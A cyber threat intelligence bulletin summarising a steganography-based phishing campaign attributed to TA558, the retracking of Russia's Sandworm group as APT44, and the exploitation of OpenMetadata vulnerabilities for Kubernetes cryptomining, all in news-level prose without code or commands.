Ransomware/Malware Activity

SteganoAmor Malware Campaign Hides Malicious Payloads via Steganography

Researchers at Positive Technologies have identified over 320 attacks in a malware campaign primarily targeting organizations in Latin America leveraging steganography to obfuscate malicious payloads. The hacking group TA558 is believed to be behind the operation. The SteganoAmor attack begins with a phishing email that is sent from compromised SMTP servers to exploit the positive reputation of existing domains. The phishing email contains Microsoft documents such as Excel or Word that are crafted to exploit a known Microsoft Equation Editor vulnerability tracked as CVE-2017-11882. This flaw is nearly seven (7) years old, and the exploit will check the version of Microsoft Office installed to determine whether it will advance to the next stage of the campaign which downloads a Visual Basic Script (VBS). The script grabs an image file which uses steganography to hide PowerShell code that downloads the final payload stored in a legitimate cloud service to evade detection by anti-virus tools. Researchers have seen multiple forms of malware delivered via the final payload including AgentTesla, Remcos, LokiBot, XWorm, and more. All are forms of either remote access tools or infostealers, designed to send stolen information back to the attacker on compromised FTP servers. The use of steganography in this attack provides an evasion technique not commonly seen in modern campaigns. However, the flaw in Equation Editor required to carry out the attack is quite old, meaning organizations with later versions of Microsoft Office are safe from the SteganoAmor campaign. CTIX analysts will continue to report on novel and evolving malware versions and associated campaigns.

Threat Actor Activity

Russian-backed Sandworm Hackers Upgraded to APT44 in Response to Heighted Threat Posed

The Sandworm hacking group, a threat actor with strong ties to Russia's Main Intelligence Directorate (GRU), and previously known as BlackEnergy, Seashell Blizzard, or Voodoo Bear, is now being tracked as APT44 due to the group's highly adaptive nature and significant concern for risks they pose to governments and critical infrastructure organizations around the world. APT44 has been leveraging sophisticated cyber tactics to conduct espionage, sabotage, and influence operations on a global scale for a decade and a half. Active since at least 2009, this group has evolved its strategies over time, but their true strength has been particularly highlighted in the wake of Russia's invasion of Ukraine, showcasing their ability to support Russia's military campaign with cyber warfare capabilities. APT44 has adeptly used online personas and Telegram channels, such as XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek, to obfuscate its activities, posing as independent hacktivist groups while conducting operations that align with Russia's strategic interests. These platforms have been instrumental in leaking sensitive information, claiming responsibility for cyberattacks, and spreading narratives favorable to Russia, effectively blurring the lines between state-sponsored activities and grassroots hacktivism. The group's cyber operations have been wide-ranging and impactful, targeting not only Ukraine with data-wiping malware and other destructive attacks, but also targeting NATO countries' electoral systems and critical infrastructure across the US and Europe. APT44 has been linked to significant cyber incidents in the past, such as the deployment of NotPetya malware, the WannaCry ransomware attack, and disruptions to water utility infrastructure, including a recent overflow event in Texas. Recent reports underscore the adaptability and sophistication of APT44, highlighting their role in shaping Russia's cyber offensive capabilities. The group's continued focus on Ukraine, coupled with its targeting of countries where Russian interests intersect, signifies a persistent and severe threat to global security.

Vulnerabilities

Attackers Exploit OpenMetadata Applications for Kubernetes Cryptomining Campaign

Threat actors have been observed exploiting multiple critical vulnerabilities in OpenMetadata, a popular open-source metadata management tool, to carry out a Kubernetes cryptomining campaign. The vulnerabilities, identified as CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, and CVE-2024-28254, include several critical remote code execution and authentication flaws, allowing attackers to hijack unpatched, internet-exposed OpenMetadata workloads. Since early April 2024, these vulnerabilities have enabled threat actors to execute code remotely, perform reconnaissance, and download cryptomining malware from a command-and-control (C2) server located in China. The attackers set up persistent access through cron jobs and Netcat reverse shells, and even leave notes pleading for Monero donations to buy a car or "suite" in China. This situation underscores the crucial importance of using strong authentication, keeping software up to date, and adhering to security best practices in containerized environments to prevent exploitation. CTIX analysts urge all OpenMetadata administrators to ensure their instances are up-to-date.

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.